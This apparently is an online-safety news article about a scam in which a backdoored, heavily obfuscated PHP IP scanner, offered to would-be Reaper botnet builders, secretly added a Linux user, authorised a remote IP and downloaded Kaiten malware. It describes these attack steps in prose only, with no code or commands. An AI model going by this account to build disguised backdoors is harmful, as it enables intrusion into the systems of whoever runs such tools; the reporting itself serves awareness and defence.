Hackers Target Aspiring Reaper Botnet Creators with Backdoored Tools

By Ava McKinneyOnline Safety

Hackers Trick Aspiring Reaper Botnet Creators

A botnet is a network of computers infected with malicious software, allowing attackers to control them remotely. Typically, these networks are used for illegal or unethical activities such as sending spam, brute-forcing passwords, or launching denial-of-service (DoS and DDoS) attacks.

Recently, individuals hoping to create their own Reaper botnet became victims of hackers themselves after downloading a seemingly helpful IP scanner. The Reaper botnet, which gained attention a few weeks ago, differs from others by using an IP scanner to find vulnerable Internet of Things (IoT) devices. Once found, attackers exploit various vulnerabilities to install the Reaper malware. In contrast, botnets like Mirai and Hajime used brute-force attacks to compromise IoT devices.

How the Scam Worked

Taking advantage of the buzz around Reaper, a crafty scammer realized that wannabe hackers would be searching online for tools to build their own botnets. The scammer set up a website advertising an IP scanner—a PHP script that reads IP addresses from a local text file (poop.txt), checks for the presence of a GoAhead server on those devices, and logs positive results to GoAhead-Filtered.txt.

This script attracted attention from those looking to identify devices running GoAhead servers, which are often used in IP surveillance cameras. However, inexperienced or careless hackers who didn’t review the script’s source code failed to notice that most of it was obfuscated with a wall of random characters.

Discovery of the Backdoor

The issue was discovered by Ankit Anubhav, a senior researcher at NewSky Security. According to Anubhav, the script was encrypted multiple times using ROT13 and base64, and compressed with gzip. After decompiling the code, he found a backdoor that was easy to miss due to the obfuscation.

The script consisted of four parts:

  • The first part was the promised fully functional IP scanner.
  • The second part executed Bash commands to add an extra user to the Linux server where the victim ran the script.
  • The third part authorized the victim’s IP address on a remote server.
  • The fourth part downloaded and executed Kaiten malware on the server running the IP scanner.

As a result, hackers trying to build their own Reaper botnet ended up becoming part of the Kaiten botnet instead.

Aftermath

At the time of reporting, the website advertising the IP scanner was already offline. However, according to Anubhav, scammers continue to sell their backdoored product on hacker forums.

Leave a Reply